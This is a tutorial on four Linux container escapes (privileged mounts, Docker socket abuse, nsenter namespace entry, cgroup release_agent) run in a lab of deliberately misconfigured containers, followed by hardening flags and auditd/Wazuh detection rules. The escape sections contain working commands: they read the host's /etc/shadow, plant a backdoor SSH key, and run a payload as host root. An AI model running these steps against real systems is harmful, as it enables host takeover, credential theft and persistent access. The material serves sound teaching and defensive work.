Tutorial

Container Escape: Namespace and Privilege Breakouts

Exploit four container escape techniques — privileged mounts, Docker socket abuse, namespace escapes, and cgroup release_agent — then harden against each one.

14 min read · Advanced

Prerequisites

  • Familiarity with Linux namespaces and cgroups
  • Docker or Podman usage experience
  • Understanding of Linux syscalls and capabilities
  • Root access to a test machine or VM

Containers are the dominant deployment unit in modern infrastructure, and the security model behind them is widely misunderstood. The abstraction is clean — an isolated filesystem, process tree, and network stack — but underneath, a container is a set of kernel features applied to a regular Linux process. There is no hypervisor. There is no hardware boundary. Every container escape exploits the fact that the host kernel is shared.

This tutorial demonstrates four container escape techniques against deliberately misconfigured containers, then shows how to harden against each one. The goal is to build an accurate mental model of what containers actually isolate, where the boundaries are thin, and what configurations break them entirely.

How containers isolate

A container is not a VM. A virtual machine runs its own kernel on emulated (or virtualized) hardware. A container runs as a process on the host kernel, with isolation enforced by four kernel subsystems working together.

        Virtual Machine                        Container

┌─────────────────────────┐       ┌─────────────────────────┐
│     Guest Userspace     │       │   Container Process     │
├─────────────────────────┤       │   (isolated view)       │
│     Guest Kernel        │       └────────────┬────────────┘
├─────────────────────────┤                    │
│     Hypervisor          │       ┌────────────┴────────────┐
├─────────────────────────┤       │   Namespaces            │
│     Host Kernel         │       │   Cgroups               │
├─────────────────────────┤       │   Seccomp               │
│     Host Hardware       │       │   Capabilities          │
└─────────────────────────┘       ├─────────────────────────┤
                                  │   Host Kernel (shared)  │
                                  ├─────────────────────────┤
                                  │   Host Hardware         │
                                  └─────────────────────────┘

Namespaces give each container its own view of system resources. Modern kernels support eight namespace types (the time namespace, added in Linux 5.6, is rarely relevant to container runtimes); the seven that matter for container isolation are:

Namespace   Isolates                             Effect
PID         Process IDs                          Container sees only its own processes; PID 1 is the entrypoint
NET         Network stack                        Container gets its own interfaces, routing table, iptables rules
MNT         Filesystem mounts                    Container sees only its own mount tree
UTS         Hostname and domain                  Container can set its own hostname
IPC         System V IPC, POSIX message queues   Shared memory segments are isolated
USER        User and group IDs                   UID 0 inside can map to an unprivileged UID on the host
cgroup      Cgroup root view                     Container sees only its own cgroup hierarchy
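Namespace membership is visible from userspace: each entry under /proc/<pid>/ns is a symlink whose inode number identifies the namespace. A quick sketch using only readlink:

```shell
# Each /proc/<pid>/ns entry is a symlink like "uts:[4026531838]".
# Two processes share a namespace exactly when the inode numbers match.
readlink /proc/$$/ns/uts
readlink /proc/self/ns/uts   # readlink itself runs in the same namespaces
```

Comparing these inodes between a suspect process and host PID 1 is a fast way to confirm or rule out namespace sharing.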

Cgroups v2 limit resource consumption. They prevent a container from exhausting host CPU, memory, I/O, or PIDs. Cgroups do not provide security isolation — they are a denial-of-service prevention mechanism. However, the cgroup filesystem itself can become an escape vector, as we’ll see. Cgroup v1 had a flat hierarchy with separate controllers (cpu, memory, blkio, etc.) each mounted independently. Cgroup v2 uses a unified hierarchy, which simplifies management and — critically for this tutorial — removes the release_agent mechanism that enabled one of the escape techniques we’ll demonstrate.
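As a quick check of which cgroup version a machine is running, you can inspect the filesystem type mounted at the cgroup root (sketch assumes GNU stat on a Linux host):

```shell
# Report the filesystem type at the cgroup root:
#   cgroup2fs -> pure cgroup v2 (unified hierarchy, no release_agent)
#   tmpfs     -> cgroup v1 or hybrid (per-controller mounts underneath)
stat -fc %T /sys/fs/cgroup
```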

Seccomp (Secure Computing Mode) filters syscalls at the kernel level. A seccomp filter is a BPF program attached to a process that intercepts every syscall before it enters the kernel. The default Docker/Podman seccomp profile blocks roughly 44 of the 300+ syscalls on x86_64, including dangerous ones like mount, reboot, kexec_load, ptrace, and bpf. Disabling seccomp (or running privileged) removes this filter entirely, exposing the full syscall surface to the container process.
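Whether a seccomp filter is currently attached to a process can be read directly from /proc; for example:

```shell
# The Seccomp field in /proc/<pid>/status shows the filter state:
#   0 = disabled, 1 = strict mode, 2 = filter mode (a BPF profile is attached)
grep '^Seccomp:' /proc/$$/status
```

Inside a default Docker/Podman container this reports 2; with seccomp=unconfined or --privileged it reports 0.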

Linux capabilities split root’s monolithic power into ~41 discrete permissions. Instead of a binary root/non-root check, the kernel evaluates specific capabilities for each privileged operation. CAP_NET_BIND_SERVICE allows binding to ports below 1024. CAP_SYS_ADMIN allows mounting filesystems, configuring namespaces, and dozens of other operations (it’s the “catch-all” capability and the most dangerous). A default container gets a reduced set — typically CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FOWNER, CAP_NET_BIND_SERVICE, and a handful of others. Running with --privileged grants all capabilities, disables seccomp, and gives device access, which is functionally equivalent to root on the host.
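The active capability set is exposed in /proc as a hex bitmask; a sketch (the decode step assumes libcap's capsh is installed, and the value varies by environment):

```shell
# Read this shell's effective capability set as a hex bitmask.
CAPS=$(awk '/^CapEff:/ {print $2}' /proc/$$/status)
echo "CapEff: $CAPS"
# Decode the bitmask into capability names if libcap's capsh is installed.
command -v capsh >/dev/null && capsh --decode="$CAPS" || true
```

A fully privileged process shows an all-ones mask; a default container shows a much smaller value.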

Insight

The shared kernel boundary

Every escape in this tutorial exploits the same fundamental fact: the container and the host share a kernel. Namespaces control what a process can see. Capabilities and seccomp control what it can do. But if you grant enough capabilities or disable enough restrictions, the process can reach through those boundaries because the kernel doesn’t distinguish between “container root” and “host root” at the syscall level — it only checks capabilities.

Lab setup

This lab uses Podman to create deliberately vulnerable containers. Each container is configured with a specific misconfiguration that enables one escape technique.

Warning

Run this lab only in a disposable VM or test environment. These containers are intentionally misconfigured to allow full host compromise. Never run these configurations on production systems, shared machines, or any system with data you care about.

Create the lab setup script.

#!/bin/bash
# container-escape-lab.sh
# Starts four deliberately vulnerable containers for escape practice.
# ONLY run this in an isolated VM.

set -euo pipefail

LAB_NET="escape-lab"
IMAGE="docker.io/library/ubuntu:24.04"

echo "[*] Pulling base image..."
podman pull "$IMAGE"

echo "[*] Creating lab network..."
podman network create "$LAB_NET" 2>/dev/null || true

# Use a Docker-compatible API socket for Escape 2.
if [ -S /var/run/docker.sock ]; then
  API_SOCK=/var/run/docker.sock
elif [ -S /run/podman/podman.sock ]; then
  API_SOCK=/run/podman/podman.sock
elif [ -n "${XDG_RUNTIME_DIR:-}" ] && [ -S "${XDG_RUNTIME_DIR}/podman/podman.sock" ]; then
  API_SOCK="${XDG_RUNTIME_DIR}/podman/podman.sock"
else
  echo "[!] No Docker-compatible container API socket found."
  echo "[!] Start Docker, or enable Podman socket:"
  echo "    systemctl enable --now podman.socket"
  exit 1
fi
echo "[*] Using API socket: $API_SOCK"

echo "[*] Starting Escape 1: Privileged container"
podman run -d --name escape1-privileged \
  --privileged \
  --network "$LAB_NET" \
  "$IMAGE" sleep infinity

echo "[*] Starting Escape 2: Docker socket mount"
podman run -d --name escape2-socket \
  -v "$API_SOCK:/var/run/docker.sock" \
  --network "$LAB_NET" \
  "$IMAGE" sleep infinity

echo "[*] Starting Escape 3: Shared PID namespace"
podman run -d --name escape3-pidhost \
  --pid=host \
  --privileged \
  --network "$LAB_NET" \
  "$IMAGE" sleep infinity

echo "[*] Starting Escape 4: Writable cgroup (cgroup v1)"
podman run -d --name escape4-cgroup \
  --security-opt apparmor=unconfined \
  --security-opt seccomp=unconfined \
  --cap-add=SYS_ADMIN \
  --cgroupns=host \
  --network "$LAB_NET" \
  "$IMAGE" sleep infinity

echo ""
echo "[+] Lab containers running:"
podman ps --filter "network=$LAB_NET" --format "table {{.Names}}\t{{.Status}}"
echo ""
echo "[*] Enter a container with: podman exec -it <name> bash"
echo "[*] Tear down with:         podman rm -f escape1-privileged escape2-socket escape3-pidhost escape4-cgroup"

Install tools inside each container as needed.

# For each container, install basic utilities
for c in escape1-privileged escape2-socket escape3-pidhost escape4-cgroup; do
  podman exec "$c" apt-get update -qq
  podman exec "$c" apt-get install -y -qq curl util-linux iproute2 procps libcap2-bin python3 openssh-client > /dev/null
done

Tip

If your test VM uses cgroup v2 only (most modern distros), Escape 4 won’t work as written. To test the cgroup release_agent technique, boot the VM with systemd.unified_cgroup_hierarchy=0 on the kernel command line to enable the hybrid or legacy cgroup hierarchy.

Escape 1: Privileged container to host filesystem

The --privileged flag is the most dangerous container configuration. It grants all Linux capabilities, disables seccomp, mounts all host devices into the container’s /dev, and removes AppArmor/SELinux confinement. It exists for cases like running Docker-in-Docker or accessing hardware directly — but it completely destroys the container security boundary.

Identifying a privileged container

Enter the container and check your capabilities.

podman exec -it escape1-privileged bash

Inside the container, list the current capabilities.

capsh --print | grep "Current:"

A privileged container returns a full bitmask. You’ll see every capability listed, including dangerous ones like CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_DAC_READ_SEARCH, and CAP_SYS_RAWIO.

Check for device access.

ls /dev/sda* /dev/vda* /dev/nvme* 2>/dev/null

In a normal container, /dev contains only a few virtual devices. In a privileged container, you’ll see the host’s actual block devices — the physical (or virtual) disks.

Mounting the host filesystem

Identify the host root partition. If your VM uses /dev/sda1 or /dev/vda1:

fdisk -l /dev/sda 2>/dev/null || fdisk -l /dev/vda 2>/dev/null

Mount the host root filesystem.

mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

You now have full read-write access to the host’s filesystem from inside the container.

# Read the host's shadow file
cat /mnt/host/etc/shadow

# List host users with login shells
grep -v nologin /mnt/host/etc/passwd

# Read the host's SSH keys
ls -la /mnt/host/root/.ssh/
cat /mnt/host/root/.ssh/authorized_keys

Writing persistent access

Add an SSH key to the host’s authorized_keys.

# Generate a key pair inside the container
ssh-keygen -t ed25519 -f /tmp/backdoor -N ""

# Write the public key to the host's authorized_keys
mkdir -p /mnt/host/root/.ssh
cat /tmp/backdoor.pub >> /mnt/host/root/.ssh/authorized_keys
chmod 600 /mnt/host/root/.ssh/authorized_keys

Full escape with nsenter

With --privileged, you can also use nsenter to enter the host’s namespaces directly, but only when host PID 1 is visible, which requires sharing the host PID namespace (--pid=host, as in Escape 3). In this container, which keeps its own PID namespace, /proc/1 is the container’s entrypoint, so get a host shell through the mounted filesystem instead (for example, chroot /mnt/host /bin/bash). Where host PIDs are visible, the nsenter route is:

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

This drops you into a shell that is, for all practical purposes, running directly on the host as root. You’ve left the container entirely.

# Verify you're on the host
hostname
cat /etc/os-release
ps aux | head -20

Insight

Why --privileged exists

The --privileged flag was originally designed for running the Docker daemon inside a container (DinD) and for containers that need direct hardware access. In both cases, the container must operate with host-level privileges. The problem is that --privileged is often used as a shortcut for debugging permission issues, and it persists into production. Any container running with --privileged is not actually contained.

Escape 2: Docker socket mount

Mounting /var/run/docker.sock into a container is extremely common in CI/CD pipelines (Jenkins, GitLab CI), monitoring tools (cAdvisor, Datadog), and container management UIs (Portainer). The Docker socket is a Unix socket that provides full, unauthenticated access to the Docker API. Access to this socket is equivalent to root on the host.

The Docker API attack

Enter the container.

podman exec -it escape2-socket bash

Verify the socket is available.

ls -la /var/run/docker.sock

You don’t need the Docker CLI to exploit this. The Docker API speaks HTTP over the Unix socket, and curl can talk to Unix sockets directly.

List running containers via the API.

curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | \
  python3 -c "import sys,json; [print(c['Names'][0], c['Image']) for c in json.load(sys.stdin)]"

Creating an escape container

Create a new container via the API that mounts the host root filesystem.

# Create the container
curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/create?name=escape-host \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "ubuntu:24.04",
    "Cmd": ["/bin/bash"],
    "Tty": true,
    "OpenStdin": true,
    "HostConfig": {
      "Binds": ["/:/hostfs"],
      "Privileged": true
    }
  }'

# Start it
curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/escape-host/start

Now attach to the new container — or more practically, use the exec endpoint to run commands.

# Execute a command in the escape container to read host files
# First, create the exec instance
EXEC_ID=$(curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/escape-host/exec \
  -H "Content-Type: application/json" \
  -d '{"Cmd":["cat","/hostfs/etc/shadow"],"AttachStdout":true}' | \
  python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")

# Then start it
curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/exec/${EXEC_ID}/start" \
  -H "Content-Type: application/json" \
  -d '{"Detach":false}'

This returns the contents of the host’s /etc/shadow, demonstrating full host filesystem access through a container that only had the Docker socket mounted.

The broader implication

The Docker socket grants the ability to:

  • Create privileged containers with host volume mounts
  • Execute arbitrary commands on the host via new containers
  • Read and write any file on the host filesystem
  • Modify running containers and images
  • Stop or remove other containers (denial of service)

Warning

“Read-only” Docker socket mounts (-v /var/run/docker.sock:/var/run/docker.sock:ro) do not help. The :ro flag prevents the container from deleting or replacing the socket file. It does nothing to restrict the API calls made through the socket. The API itself has no read-only mode.

Escape 3: Namespace escape via nsenter

When a container runs with --pid=host, the PID namespace isolation is removed. The container process can see every process on the host. Combined with sufficient capabilities (which --privileged provides), this allows direct entry into the host’s namespaces.

Seeing host processes

Enter the container.

podman exec -it escape3-pidhost bash

List processes. You’ll see the full host process tree, not just the container’s processes.

ps aux

You’ll see systemd (PID 1), kernel threads, SSH daemons, the container runtime, and everything else running on the host. In a properly namespaced container, ps aux would only show the container’s entrypoint process and its children.
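A quick heuristic for spotting a shared PID namespace, using only /proc so it works even in minimal images without procps:

```shell
# Count PIDs visible in /proc. An isolated container typically sees only
# a handful; with --pid=host this matches the host's full process table.
ls -d /proc/[0-9]* | wc -l
```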

Entering the host namespaces

Each process on Linux has a set of namespace references in /proc/<pid>/ns/. When you can see host PID 1, you can enter its namespaces.

ls -la /proc/1/ns/

Use nsenter to enter all of PID 1’s namespaces.

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

Each flag enters a specific namespace of the target process:

Flag      Namespace   Effect
--mount   MNT         See the host’s filesystem mounts
--uts     UTS         See the host’s hostname
--ipc     IPC         Access the host’s shared memory
--net     NET         Use the host’s network stack
--pid     PID         See the host’s process tree

After nsenter, you’re operating in the host’s context. Verify it.

hostname
mount | head -10
ip addr
cat /etc/hostname

Why --pid=host is used

The --pid=host flag is typically used for debugging and monitoring containers — tools that need to observe host processes. It’s sometimes combined with --privileged for troubleshooting. The combination of both flags is functionally equivalent to running directly on the host.

Tip

If you only need process visibility for monitoring (e.g., running htop or a metrics exporter), consider bind-mounting the host’s /proc read-only at a separate path (for example, -v /proc:/host/proc:ro) instead of sharing the PID namespace. This provides read-only visibility without enabling namespace traversal.

Escape 4: cgroup release_agent (CVE-2022-0492)

This escape is more subtle than the previous three. It doesn’t require --privileged or a mounted socket — just CAP_SYS_ADMIN and the ability to write to the cgroup filesystem. It exploits the release_agent mechanism in cgroup v1.

How cgroup release_agent works

In cgroup v1, each cgroup hierarchy has a release_agent file at its root. When a cgroup has notify_on_release set to 1 and the last process in that cgroup exits, the kernel executes the program specified in release_agent — and it executes it on the host, outside any container namespace.

┌─────────────────────────────────────────────┐
│  Container                                  │
│                                             │
│  1. Create child cgroup                     │
│  2. Set notify_on_release = 1               │
│  3. Write host path to release_agent        │
│  4. Put a process in the child cgroup       │
│  5. Kill the process (last one exits)       │
│                                             │
└──────────────────────┬──────────────────────┘
                       │ cgroup event

┌─────────────────────────────────────────────┐
│  Host Kernel                                │
│                                             │
│  Kernel executes release_agent script       │
│  → runs ON THE HOST, as root                │
│  → outside all container namespaces         │
│                                             │
└─────────────────────────────────────────────┘

Executing the escape

Enter the container.

podman exec -it escape4-cgroup bash

First, find the container’s location on the host filesystem. The container’s filesystem is visible from the host at a path we can discover through the cgroup mount.

# Find the cgroup mount point
mount | grep cgroup

Identify the cgroup path for this container and the writable hierarchy.

# Find a writable cgroup hierarchy
# In cgroup v1, RDMA or other hierarchies may be writable
CGROUP_MOUNT=$(mount | grep "cgroup " | head -1 | awk '{print $3}')
echo "Cgroup mount: $CGROUP_MOUNT"

Now determine the host path to the container’s filesystem. This is needed because the release_agent script will execute on the host, so it needs a path the host kernel can resolve.

# Get the host path to the container's filesystem
# This is available via /proc/1/mountinfo
HOST_PATH=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /proc/1/mountinfo | head -1)
if [ -z "$HOST_PATH" ]; then
  echo "Could not resolve host overlay path from /proc/1/mountinfo"
  exit 1
fi
echo "Host path: $HOST_PATH"

Create the exploit.

# Create the payload script in the container rootfs.
# The host sees it at $HOST_PATH/cmd.sh. The payload must also write its
# output via $HOST_PATH: it runs on the host, where a bare
# /output_from_host would land in the host's root, not the container's.
CONTAINER_SCRIPT="/cmd.sh"
CONTAINER_OUTPUT="/output_from_host"
HOST_SCRIPT="$HOST_PATH/cmd.sh"

# Unquoted heredoc delimiter so $HOST_PATH expands now.
cat > "$CONTAINER_SCRIPT" << INNEREOF
#!/bin/sh
ps aux > $HOST_PATH/output_from_host
cat /etc/hostname >> $HOST_PATH/output_from_host
id >> $HOST_PATH/output_from_host
INNEREOF
chmod +x "$CONTAINER_SCRIPT"

# Create a child cgroup
mkdir -p "$CGROUP_MOUNT/escape"

# Set notify_on_release
echo 1 > "$CGROUP_MOUNT/escape/notify_on_release"

# Set the release_agent to our script (using the host-visible path)
echo "$HOST_SCRIPT" > "$CGROUP_MOUNT/release_agent"

# Trigger: put a process in the child cgroup, then let it exit
sh -c "echo \$\$ > $CGROUP_MOUNT/escape/cgroup.procs && sleep 0.1"

After the sh process exits, it’s the last process in the escape cgroup. The kernel invokes the release_agent on the host.

# Check the output (give it a moment)
sleep 1
cat "$CONTAINER_OUTPUT"

If successful, you’ll see the host’s process list, hostname, and uid=0(root) — proof that the script executed on the host as root.

Requirements and limitations

This escape requires a specific combination of conditions:

  • cgroup v1: The release_agent mechanism doesn’t exist in cgroup v2. Most modern distributions default to cgroup v2.
  • CAP_SYS_ADMIN: Needed to mount cgroup filesystems and write to release_agent.
  • Host cgroup namespace or writable cgroup: The container must be able to write to the cgroup hierarchy root, which requires --cgroupns=host or equivalent.
  • No AppArmor/SELinux: Mandatory access control policies can block writes to cgroup files.

CVE-2022-0492 addressed the specific kernel bug where unprivileged users within a user namespace could write to release_agent, but the underlying mechanism still works when CAP_SYS_ADMIN is explicitly granted.

Insight

The cgroup escape pattern

This technique is notable because it uses a legitimate kernel feature as designed. The release_agent was intended for cleanup tasks when a cgroup becomes empty. The kernel correctly executes the specified program when the last process exits. The vulnerability isn’t a bug in the traditional sense — it’s a feature that was never designed with container isolation in mind, operating on a kernel subsystem that predates containers by years.

Secure container configuration

Each escape exploited a specific misconfiguration. Here’s the defense for each one, and at the end, a single hardened container command that applies all protections simultaneously.

Defense against Escape 1: Drop capabilities

Never use --privileged. Instead, drop all capabilities and add back only what the application needs.

podman run -d --name hardened-app \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  my-app:latest

The --cap-drop=ALL removes every capability. --cap-add selectively restores only what’s required. Most applications need at most two or three capabilities. If you don’t know which ones your application needs, run it with all capabilities dropped and add back whichever ones the error messages indicate are missing.

Defense against Escape 2: Never mount the Docker socket

There is no safe way to mount the Docker socket into a container. Any access to the socket is full API access.

For CI/CD pipelines that need to build container images, use alternatives:

  • Kaniko: Builds container images in userspace without a Docker daemon
  • Buildah: Builds OCI images without requiring a daemon socket
  • Podman: Daemonless container management; no socket to mount

For monitoring tools that need container metadata, use the read-only container API endpoints via a proxy that restricts which API calls are allowed.

Defense against Escape 3: Isolate PID namespace

Never use --pid=host in production. The default behavior (a private PID namespace per container) is correct for almost all workloads.

# Explicitly set (this is the default, but making it explicit prevents accidents)
podman run -d --pid=private my-app:latest

Defense against Escape 4: Restrict cgroup access

Don’t grant CAP_SYS_ADMIN unless absolutely necessary. Use cgroup v2 (which doesn’t have the release_agent mechanism). Keep containers in their own cgroup namespace.

# Ensure containers use their own cgroup namespace (default in modern Podman)
podman run -d --cgroupns=private my-app:latest

Defense in depth: The hardened run command

Apply all defenses simultaneously.

podman run -d --name production-app \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --read-only \
  --tmpfs /tmp:rw,noexec,nosuid,size=64m \
  --security-opt=no-new-privileges \
  --security-opt seccomp=/etc/containers/seccomp.json \
  --pids-limit=256 \
  --memory=512m \
  --cpus=1 \
  --pid=private \
  --cgroupns=private \
  --network=slirp4netns \
  --user 1000:1000 \
  my-app:latest

Breaking this down:

Flag                                         Defense
--cap-drop=ALL --cap-add=NET_BIND_SERVICE    Minimal capabilities
--read-only                                  Immutable rootfs prevents writing exploit scripts
--tmpfs /tmp:rw,noexec,nosuid,size=64m       Writable temp with noexec, so scripts can’t be executed from /tmp
--security-opt=no-new-privileges             Prevents suid binaries from gaining privileges
--security-opt seccomp=...                   Custom seccomp profile blocks dangerous syscalls
--pids-limit=256                             Prevents fork bombs
--memory=512m --cpus=1                       Resource limits prevent host starvation
--pid=private                                Own PID namespace
--cgroupns=private                           Own cgroup namespace
--network=slirp4netns                        Rootless networking (no CAP_NET_ADMIN needed)
--user 1000:1000                             Non-root user inside the container

Tip

Rootless Podman as a baseline

Running Podman rootless (as a non-root user) applies user namespace mapping automatically. Root inside the container maps to your unprivileged UID on the host. Even if an attacker escapes the container, they land as an unprivileged user. This single change mitigates the majority of container escape techniques because most escapes require true host root privileges to be useful.
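You can verify the user namespace mapping from inside any process by reading /proc; for example:

```shell
# Each line of uid_map is: <UID inside the ns> <UID on the host> <range>.
# The initial namespace shows "0 0 4294967295"; a rootless container
# shows UID 0 mapped to the unprivileged host UID that launched it.
cat /proc/self/uid_map
```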

Seccomp profile hardening

The default seccomp profile is a good start, but you can tighten it further. Generate a profile specific to your application by tracing its syscalls, then locking down the allowlist.

# Trace syscalls your application uses during a test run
podman run --rm --security-opt seccomp=unconfined \
  --annotation io.containers.trace-syscall="of:/tmp/seccomp-profile.json" \
  my-app:latest /run-test-suite.sh

# Use the generated profile
podman run -d \
  --security-opt seccomp=/tmp/seccomp-profile.json \
  my-app:latest

This produces a minimal seccomp profile that allows only the syscalls your application actually uses during testing.

Detection

Hardening prevents escapes, but defense in depth requires detection as well. The following rules cover auditd (host-level syscall auditing) and Wazuh (SIEM correlation and alerting) for each escape vector.

Detecting mount syscalls from containers

Escape 1 uses mount to attach host block devices. Container processes should almost never call mount.

Auditd rule:

# /etc/audit/rules.d/container-mount.rules
# Watch for mount syscalls from processes in non-root mount namespaces
-a always,exit -F arch=b64 -S mount -S umount2 -F auid>=1000 -F key=container_mount
-a always,exit -F arch=b64 -S mount -S umount2 -F exe=/usr/bin/nsenter -F key=container_mount

Wazuh rule to alert on the auditd events:

<group name="container_escape,">
  <rule id="100410" level="12">
    <if_sid>80700</if_sid>
    <field name="audit.key">container_mount</field>
    <description>Mount syscall detected from container context — possible container escape attempt.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,privilege_escalation,</group>
  </rule>
</group>

Detecting Docker socket access

Escape 2 communicates with the Docker socket from inside a container. Monitor access to the socket.

Auditd rule:

# /etc/audit/rules.d/docker-socket.rules
# Watch for access to the Docker socket
-w /var/run/docker.sock -p rwa -k docker_socket_access

Wazuh rule:

<group name="container_escape,">
  <rule id="100411" level="10">
    <if_sid>80700</if_sid>
    <field name="audit.key">docker_socket_access</field>
    <description>Docker socket accessed — check if source process is authorized.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,</group>
  </rule>

  <!-- Higher severity when curl or wget accesses the socket -->
  <rule id="100412" level="14">
    <if_sid>100411</if_sid>
    <field name="audit.exe">(curl|wget|python)</field>
    <description>Docker socket accessed by unusual process — likely container escape via API abuse.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,privilege_escalation,</group>
  </rule>
</group>

Detecting nsenter usage

Escapes 1 and 3 use nsenter to cross namespace boundaries. This binary should rarely be executed in production.

Auditd rule:

# /etc/audit/rules.d/nsenter.rules
# Watch for nsenter execution
-w /usr/bin/nsenter -p x -k nsenter_execution

Wazuh rule:

<group name="container_escape,">
  <rule id="100413" level="13">
    <if_sid>80700</if_sid>
    <field name="audit.key">nsenter_execution</field>
    <description>nsenter executed — possible namespace escape from container.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,privilege_escalation,</group>
  </rule>
</group>

Detecting cgroup release_agent modification

Escape 4 writes to the release_agent file. This file should never be modified by container processes.

Auditd rule:

# /etc/audit/rules.d/cgroup-release-agent.rules
# Watch for writes to any release_agent file in cgroup hierarchies
-w /sys/fs/cgroup/ -p wa -k cgroup_modification

Wazuh rule:

<group name="container_escape,">
  <rule id="100414" level="14">
    <if_sid>80700</if_sid>
    <field name="audit.key">cgroup_modification</field>
    <match>release_agent</match>
    <description>cgroup release_agent modified — possible CVE-2022-0492 container escape.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,privilege_escalation,</group>
  </rule>

  <rule id="100415" level="12">
    <if_sid>80700</if_sid>
    <field name="audit.key">cgroup_modification</field>
    <match>notify_on_release</match>
    <description>cgroup notify_on_release modified — possible setup for cgroup escape.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,</group>
  </rule>
</group>

Centralized alert dashboard

With these rules deployed, Wazuh will generate alerts at levels 10-14 for container escape activity. A practical alert strategy:

Alert Level   Escape Vector                     Response
14            Docker socket + unusual process   Immediate investigation
14            cgroup release_agent write        Immediate investigation
13            nsenter execution                 Investigate within 15 minutes
12            Mount syscall from container      Investigate within 1 hour
10            Docker socket access              Review daily

Tip

Reduce noise with context

The auditd rules above will generate events for legitimate container operations too (e.g., the container runtime itself calls mount). To reduce false positives, add -F exe!=/usr/bin/runc and similar exclusions for your container runtime. The Wazuh rules can use <if_sid> chains to require multiple suspicious behaviors before alerting at high severity.
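The runtime exclusion this tip describes can go straight into the auditd rule; a sketch (the runc/crun paths are assumptions, so adjust them to where your distro installs its runtime, and the exe field with != requires a reasonably recent auditd):

```
# /etc/audit/rules.d/container-mount-tuned.rules
# Same mount watch as before, but ignore the container runtimes themselves.
-a always,exit -F arch=b64 -S mount -S umount2 -F exe!=/usr/bin/runc -F exe!=/usr/bin/crun -F auid>=1000 -F key=container_mount
```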

Where to go from here

This tutorial covered four escape techniques against specific misconfigurations. The container escape landscape is broader than this — other vectors include kernel exploits (CVE-2022-0847 Dirty Pipe, CVE-2016-5195 Dirty COW), container runtime vulnerabilities (CVE-2019-5736 allowed overwriting the host runc binary from within a container), image supply chain attacks (malicious base images, compromised registries), and cloud metadata service abuse from within containers (SSRF to 169.254.169.254 to steal IAM credentials). Each of those deserves its own treatment.

For production environments, consider these additional layers beyond what this tutorial covered:

  • gVisor or Kata Containers: These provide a stronger isolation boundary. gVisor intercepts syscalls with a user-space kernel, reducing the host kernel’s attack surface. Kata Containers run each container in a lightweight VM, providing hardware-level isolation while maintaining container ergonomics.
  • Pod Security Standards: Kubernetes provides three built-in policy levels (Privileged, Baseline, Restricted) that enforce many of the hardening measures covered here at the cluster level, preventing misconfigured containers from being deployed in the first place.
  • Runtime security tools: Falco, Tracee, and Tetragon can detect escape attempts in real time by monitoring syscalls, file access patterns, and network activity from eBPF hooks, providing deeper visibility than auditd alone.

The key takeaway is structural: containers provide process-level isolation, not machine-level isolation. Every configuration flag you set either strengthens or weakens that boundary. Start from the hardened baseline, grant only what’s necessary, monitor for the specific syscalls and file accesses that indicate boundary violations, and treat any container with --privileged or a mounted Docker socket as equivalent to root on the host — because it is.